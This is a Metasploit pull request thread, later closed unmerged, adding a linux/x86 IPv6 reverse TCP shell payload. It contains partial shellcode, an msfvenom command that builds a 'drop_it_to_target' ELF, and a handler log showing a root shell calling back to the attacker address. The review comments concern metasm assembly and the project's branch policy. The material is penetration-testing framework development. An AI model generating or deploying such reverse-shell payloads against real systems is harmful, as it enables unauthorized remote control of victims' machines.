### PR TITLE
Add linux/x86/shell_reverse_tcp_ipv6 [single payload]

### PR DESCRIPTION
**Pull request by uf0o**
This payload module is a single shell reverse tcp ipv6, which seems missing from the linux/x86 collection.
I have successully tested it with boht ncat and metasploit handler (see below)

## Verification steps

- [ ] [on attacker]
```
# msfvenom -p linux/x86/shell_reverse_tcp_ipv6 LHOST=dead:beef::2 LPORT=666 -f elf > drop_it_to_target
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 168 bytes
Final size of elf file: 252 bytes
```
- [ ] [on victim]
```
#./drop_it_to_target
```
- [ ] [on attacker]
```
#msf exploit(multi/handler) > set LHOST dead:beef::2
LHOST => dead:beef::2
#msf exploit(multi/handler) > set LPORT 666
LPORT => 666
#msf exploit(multi/handler) > set PAYLOAD linux/x86/shell_reverse_tcp_ipv6
PAYLOAD => linux/x86/shell_reverse_tcp_ipv6
#msf exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on dead:beef::2:666
msf exploit(multi/handler) > [*] Command shell session 1 opened (dead:beef::2:666 -> dead:beef::1:40278) at 2018-05-29 18:23:57 +0200
#msf exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...
#id
uid=0(root) gid=0(root) groups=0(root)
#ifconfig | grep inet6
        inet6 fe80::20c:29ff:fe9d:53c9  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::1  prefixlen 64  scopeid 0x0<global>
#netstat -antulp | grep 666
tcp6 0 0 dead:beef::1:40278 dead:beef::2:666 ESTABLISHED 2185/./drop_it_to_target
```

### CODE REVIEW

File: modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb [hunk 1]
```diff
@@ -0,0 +1,53 @@
...
+  def generate
+      target_ipv6 = IPAddr.new(datastore['LHOST']).hton.scan(/..../) # convert LHOST to expanded IPv6 address in hex format
+      first_dword  = target_ipv6[0]
+      second_dword = target_ipv6[1]
+      third_dword  = target_ipv6[2]
+      fourth_dword = target_ipv6[3]
+      "\x31\xdb\xf7\xe3\x6a\x06\x6a\x01\x6a\x0a\x89\xe1\xb0\x66\xb3\x01" +
+      "\xcd\x80\x89\xc6\x31\xc0\xb0\x02\x31\xdb\xcd\x80\x39\xd8\x74\x02" +
+      "\x77\x70\x31\xc9\x31\xdb\x53\x53" +
+      "\x68" + fourth_dword + # push the four dward on the stack in reverse order
```
Comment (timwr) [inline modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb]: personally I'd omit the `fourth_dword` etc variables and just do `"\x68" + target_ipv6[3] + # push the four dwords on the stack in reverse order`

**Comment by timwr** [comment]
You might also like metasm, you can include the assembly as opcodes and have it assembled at execution time: e.g: `Metasm::Shellcode.assemble(Metasm::Ia32.new, "mov eax, eax").encode_string
 => "\x89\xC0"`

**Comment by avanzo** [comment]
Hi @timwr, I have condensed the address variable as you suggested.
However, I prefer not to add metasm support for the time being, if is not a strict requirement.
Were you able to reproduce the payload outcome with msf handler? thanks :)

**Comment by acammack-r7** [comment]
@avanzo We would really prefer to have this generated with metasm since it is just `x86`. At the very least we need the source to in `external/source/shellcode/linux`.

**Comment by avanzo** [comment]
Hi @acammack-r7  , I have converted the module and added support for metasm, but I am getting this error when generating the payload with msfvenom:

`# msfvenom -p linux/x86/teo2 LPORT=666 LHOST=::1  -f elf > new1
Error: need something to parse!'''`

Could you please doublecheck if the the variables are passed to metasm as expected? thanks

**Comment by avanzo** [comment]
nevermind - seems working now :)
the viariables code part is ugly I know, so please suggest any improvement

**Comment by timwr** [comment]
The LHOST/LPORT variable code before e.g: https://github.com/rapid7/metasploit-framework/pull/10111/files/93c03475c88903ba0ef35da62e8590dae9fbeb38
was much simpler, was it not working in some edge cases?

**Comment by avanzo** [comment]
hi @timwr, I tried to keep the old format, but since I am writing directly in NASM I need to reverse each dword and I could not achieve the same results with the previous code.

**Comment by acammack-r7** [comment]
Hi @avanzo, I just realized this was based off of your `master` branch. Unfortunately we require that all pull requests come from unique topic branches (see: [Contributing](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md#code-contributions)). This allows us to keep better track of history and helps for integrating changes or having more than one PR open at once. 

Closing for now, but please do resubmit from a unique branch.

For building the array of integers from the address, you can use unpack to build integers directly in intentionally reverse byte-order:

```ruby
words = IPAddr.new('::1').hton.scan(/..../).map {|i| i.unpack('V')}
payload_data = <<-EOS
...
push #{words[3]}
push #{words[2]}
push #{words[1]}
push #{words[0]}
...
EOS
```

**Pull request closed without merging**